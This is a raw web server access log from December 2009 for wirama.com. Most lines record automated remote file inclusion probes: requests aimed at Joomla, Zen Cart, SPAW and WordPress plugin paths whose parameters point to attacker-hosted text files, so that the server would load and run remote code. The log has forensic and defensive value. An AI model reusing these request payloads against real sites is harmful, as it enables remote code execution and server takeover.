70.87.64.234 - - [01/Dec/2009:09:42:41 -0800] "GET /logs/?mosConfig_absolute_path=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 200 3512 "-" "Mozilla/5.0" "www.wirama.com"
150.186.34.213 - - [01/Dec/2009:09:44:11 -0800] "GET /logs/access_090329.log/?mosConfig_absolute_path=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
150.186.34.213 - - [01/Dec/2009:09:44:11 -0800] "GET /?mosConfig_absolute_path=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "www.wirama.com"
150.186.34.213 - - [01/Dec/2009:09:44:12 -0800] "GET /logs/?mosConfig_absolute_path=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 200 3512 "-" "Mozilla/5.0" "www.wirama.com"
209.97.212.185 - - [01/Dec/2009:09:44:42 -0800] "GET /logs/access_090329.log%20%20/?mosConfig_absolute_path=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
70.38.112.174 - - [01/Dec/2009:09:45:04 -0800] "GET /shopping/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
70.38.112.174 - - [01/Dec/2009:09:45:04 -0800] "GET /logs//shopping/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
70.38.112.174 - - [01/Dec/2009:09:45:04 -0800] "GET /logs/access.log//shopping/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.216.203.109 - - [01/Dec/2009:09:45:35 -0800] "GET /logs//shopping/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.216.203.109 - - [01/Dec/2009:09:45:35 -0800] "GET /logs/access.log//shopping/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.216.203.109 - - [01/Dec/2009:09:45:35 -0800] "GET /shopping/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
70.87.64.234 - - [01/Dec/2009:09:46:36 -0800] "GET /logs/access_090329.log/?mosConfig_absolute_path=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.97.212.185 - - [01/Dec/2009:09:48:15 -0800] "GET /logs/access_090501.log/?mosConfig_absolute_path=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
70.87.64.234 - - [01/Dec/2009:09:48:24 -0800] "GET /?mosConfig_absolute_path=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
70.87.64.234 - - [01/Dec/2009:09:48:24 -0800] "GET /logs/?mosConfig_absolute_path=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 200 3512 "-" "Mozilla/5.0" "wirama.com"
70.87.64.234 - - [01/Dec/2009:09:48:25 -0800] "GET /logs/access_090801.log/?mosConfig_absolute_path=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
150.186.34.213 - - [01/Dec/2009:09:48:38 -0800] "GET /logs/access_090329.log%20%20/?mosConfig_absolute_path=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
70.87.64.234 - - [01/Dec/2009:09:48:50 -0800] "GET /logs/access_090501.log/?mosConfig_absolute_path=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
65.55.207.23 - - [01/Dec/2009:09:48:55 -0800] "GET /tmp/?D=A HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
70.87.64.234 - - [01/Dec/2009:09:50:15 -0800] "GET /logs///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
70.87.64.234 - - [01/Dec/2009:09:50:15 -0800] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
70.87.64.234 - - [01/Dec/2009:09:50:15 -0800] "GET /logs/access_090330.log%20%20///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.97.212.185 - - [01/Dec/2009:09:50:16 -0800] "GET /logs/access_090330.log%20%20///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.97.212.185 - - [01/Dec/2009:09:50:16 -0800] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.97.212.185 - - [01/Dec/2009:09:50:16 -0800] "GET /logs///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
70.87.64.234 - - [01/Dec/2009:09:50:22 -0800] "GET /logs/access_090801.log%20%20///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.97.212.185 - - [01/Dec/2009:09:50:22 -0800] "GET /logs/access_090801.log%20%20///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
195.130.253.137 - - [01/Dec/2009:09:53:06 -0800] "GET /logs/access.log//shopping/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
195.130.253.137 - - [01/Dec/2009:09:53:06 -0800] "GET /shopping/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
195.130.253.137 - - [01/Dec/2009:09:53:06 -0800] "GET /logs//shopping/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
150.186.34.213 - - [01/Dec/2009:09:54:31 -0800] "GET /?mosConfig_absolute_path=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
150.186.34.213 - - [01/Dec/2009:09:54:31 -0800] "GET /logs/access_090801.log/?mosConfig_absolute_path=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
150.186.34.213 - - [01/Dec/2009:09:54:31 -0800] "GET /logs/?mosConfig_absolute_path=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 200 3512 "-" "Mozilla/5.0" "wirama.com"
209.97.212.185 - - [01/Dec/2009:09:56:18 -0800] "GET /logs/access_090330.log///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.97.212.185 - - [01/Dec/2009:09:56:18 -0800] "GET /logs/access_090801.log///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
150.186.34.213 - - [01/Dec/2009:09:56:36 -0800] "GET /logs///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
150.186.34.213 - - [01/Dec/2009:09:56:38 -0800] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
150.186.34.213 - - [01/Dec/2009:09:56:39 -0800] "GET /logs/access_090330.log%20%20///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
150.186.34.213 - - [01/Dec/2009:09:57:07 -0800] "GET /logs/access_090801.log%20%20///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
75.126.127.34 - - [01/Dec/2009:10:08:17 -0800] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
75.126.127.34 - - [01/Dec/2009:10:08:17 -0800] "GET /logs///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
75.126.127.34 - - [01/Dec/2009:10:08:17 -0800] "GET /logs/access_090801.log%20%20///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
150.186.34.213 - - [01/Dec/2009:10:09:54 -0800] "GET /logs/access_090501.log/?mosConfig_absolute_path=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
195.130.253.137 - - [01/Dec/2009:10:15:27 -0800] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
195.130.253.137 - - [01/Dec/2009:10:15:27 -0800] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
195.130.253.137 - - [01/Dec/2009:10:15:27 -0800] "GET /logs/access_090901.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
195.130.253.137 - - [01/Dec/2009:10:18:26 -0800] "GET /logs/access.log//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://come.kr/calendar315/icon/orange/id1(feelcomz).txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
150.186.34.213 - - [01/Dec/2009:10:19:45 -0800] "GET /logs/access_090501.log/?mosConfig_absolute_path=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
150.186.34.213 - - [01/Dec/2009:10:20:59 -0800] "GET /logs/access_090330.log///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
150.186.34.213 - - [01/Dec/2009:10:21:47 -0800] "GET /logs/access_090331.log///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
190.97.219.4 - - [01/Dec/2009:10:28:00 -0800] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://190.12.77.105:83/fx29id1.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
190.97.219.4 - - [01/Dec/2009:10:28:03 -0800] "GET /logs///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://190.12.77.105:83/fx29id1.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
190.97.219.4 - - [01/Dec/2009:10:28:03 -0800] "GET /logs/access_090731.log///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://190.12.77.105:83/fx29id1.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
190.97.219.4 - - [01/Dec/2009:10:28:03 -0800] "GET /logs/access_090801.log///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://190.12.77.105:83/fx29id1.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
129.7.107.93 - - [01/Dec/2009:10:28:28 -0800] "GET /logs/access_090329.log HTTP/1.1" 200 1685256 "-" ".NET Framework/2.0" "wirama.com"
150.186.34.213 - - [01/Dec/2009:10:29:49 -0800] "GET /logs/access_090801.log///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
143.248.137.66 - - [01/Dec/2009:10:52:04 -0800] "GET /logs/access_090301.log//include/mail.inc.php?skin_board_path=http://anginbali.com/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
70.38.112.174 - - [01/Dec/2009:10:52:30 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
70.38.112.174 - - [01/Dec/2009:10:52:37 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
70.38.112.174 - - [01/Dec/2009:10:52:37 -0800] "GET /logs/access_090329.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
70.38.112.174 - - [01/Dec/2009:10:52:47 -0800] "GET /logs/access.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
70.38.112.174 - - [01/Dec/2009:10:52:47 -0800] "GET /logs/access_090901.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.medprom.spb.ru/new/www/modules/cjaycontent/admin/editor2/id1a.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
143.248.137.66 - - [01/Dec/2009:10:53:13 -0800] "GET /logs/access_090701.log//include/mail.inc.php?skin_board_path=http://anginbali.com/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
143.248.137.66 - - [01/Dec/2009:10:53:13 -0800] "GET /logs//include/mail.inc.php?skin_board_path=http://anginbali.com/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
143.248.137.66 - - [01/Dec/2009:10:53:14 -0800] "GET /include/mail.inc.php?skin_board_path=http://anginbali.com/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
143.248.137.66 - - [01/Dec/2009:10:53:17 -0800] "GET /logs/access_090329.log//include/mail.inc.php?skin_board_path=http://anginbali.com/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
143.248.137.66 - - [01/Dec/2009:10:55:24 -0800] "GET /logs/access_090301.log//include/mail.inc.php?skin_board_path=http://anginbali.com/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
150.186.34.213 - - [01/Dec/2009:10:59:31 -0800] "GET /logs/access_090329.log///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://europraca.org/ariadna/xmlrpc/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
94.23.226.25 - - [01/Dec/2009:11:04:51 -0800] "GET /logs/access_090329.log HTTP/1.0" 200 1685256 "http://wirama.com/logs/access_090329.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.40607)" "wirama.com"
91.186.11.35 - - [01/Dec/2009:11:12:55 -0800] "GET /skin/zero_vote/error.php?dir=http://marmelad-card.com.ua/userfiles/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.wirama.com"
91.186.11.35 - - [01/Dec/2009:11:12:56 -0800] "GET /logs/access_090801.log//skin/zero_vote/error.php?dir=http://marmelad-card.com.ua/userfiles/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.wirama.com"
91.186.11.35 - - [01/Dec/2009:11:12:56 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://marmelad-card.com.ua/userfiles/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.wirama.com"
190.97.219.4 - - [01/Dec/2009:11:22:10 -0800] "GET /logs/access.log////?_SERVER[DOCUMENT_ROOT]=http://190.12.77.105:83/fx29id1.txt%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
190.97.219.4 - - [01/Dec/2009:11:22:10 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://190.12.77.105:83/fx29id1.txt%20? HTTP/1.1" 200 917 "-" "Mozilla/5.0" "wirama.com"
190.97.219.4 - - [01/Dec/2009:11:22:10 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://190.12.77.105:83/fx29id1.txt%20? HTTP/1.1" 200 3519 "-" "Mozilla/5.0" "wirama.com"
91.121.181.60 - - [01/Dec/2009:11:33:54 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://tikam.fileave.com/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "wirama.com"
91.121.181.60 - - [01/Dec/2009:11:33:54 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://tikam.fileave.com/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "wirama.com"
61.135.249.213 - - [01/Dec/2009:11:36:57 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" "www.wirama.com"
61.135.249.213 - - [01/Dec/2009:11:36:57 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" "www.wirama.com"
65.55.107.180 - - [01/Dec/2009:11:39:02 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.107.180 - - [01/Dec/2009:11:39:59 -0800] "GET /?D=A HTTP/1.1" 200 916 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
210.127.209.27 - - [01/Dec/2009:11:46:41 -0800] "GET /errors.php?error=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.127.209.27 - - [01/Dec/2009:11:46:41 -0800] "GET /logs/access_090401.log//errors.php?error=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.127.209.27 - - [01/Dec/2009:11:46:41 -0800] "GET /logs//errors.php?error=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.127.209.27 - - [01/Dec/2009:11:46:41 -0800] "GET /logs//errors.php?error=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.127.209.27 - - [01/Dec/2009:11:46:41 -0800] "GET /logs/access_090401.log//errors.php?error=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.127.209.27 - - [01/Dec/2009:11:46:41 -0800] "GET /errors.php?error=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.127.209.27 - - [01/Dec/2009:11:47:26 -0800] "GET /logs/access_090731.log//errors.php?error=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.127.209.27 - - [01/Dec/2009:11:47:26 -0800] "GET /logs/access_090731.log//errors.php?error=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.92.156.53 - - [01/Dec/2009:11:53:08 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.92.156.53 - - [01/Dec/2009:11:53:08 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.92.156.53 - - [01/Dec/2009:11:53:08 -0800] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
190.97.219.4 - - [01/Dec/2009:11:55:16 -0800] "GET ///setup.php?dir=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.127.209.27 - - [01/Dec/2009:11:55:36 -0800] "GET /logs/errors.php?error=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.127.209.27 - - [01/Dec/2009:11:55:37 -0800] "GET /errors.php?error=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.127.209.27 - - [01/Dec/2009:11:55:37 -0800] "GET /logs/access_090401.log/errors.php?error=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.127.209.27 - - [01/Dec/2009:11:55:54 -0800] "GET /logs/access_090401.log/errors.php?error=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.127.209.27 - - [01/Dec/2009:11:55:54 -0800] "GET /logs/errors.php?error=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.127.209.27 - - [01/Dec/2009:11:55:54 -0800] "GET /errors.php?error=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.127.209.27 - - [01/Dec/2009:11:56:35 -0800] "GET /logs/access_090731.log/errors.php?error=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.127.209.27 - - [01/Dec/2009:11:56:41 -0800] "GET /logs/access_090731.log/errors.php?error=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
190.97.219.4 - - [01/Dec/2009:11:59:20 -0800] "GET /logs/scripts.log////setup.php?dir=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.126.127.34 - - [01/Dec/2009:12:07:32 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.126.127.34 - - [01/Dec/2009:12:07:32 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.126.127.34 - - [01/Dec/2009:12:07:32 -0800] "GET /logs/access_090701.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.126.127.34 - - [01/Dec/2009:12:07:54 -0800] "GET /logs/access.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
70.38.31.183 - - [01/Dec/2009:12:13:54 -0800] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
70.38.31.183 - - [01/Dec/2009:12:13:54 -0800] "GET /logs/access_090701.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
70.38.31.183 - - [01/Dec/2009:12:13:55 -0800] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
70.38.31.183 - - [01/Dec/2009:12:14:25 -0800] "GET /logs/access.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
65.55.207.93 - - [01/Dec/2009:12:15:54 -0800] "GET /_private/ HTTP/1.1" 200 675 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
193.200.255.18 - - [01/Dec/2009:12:17:05 -0800] "GET /logs/access_090329.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.200.255.18 - - [01/Dec/2009:12:17:05 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.200.255.18 - - [01/Dec/2009:12:17:05 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.200.255.18 - - [01/Dec/2009:12:19:02 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
193.200.255.18 - - [01/Dec/2009:12:19:05 -0800] "GET /logs/access_090329.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
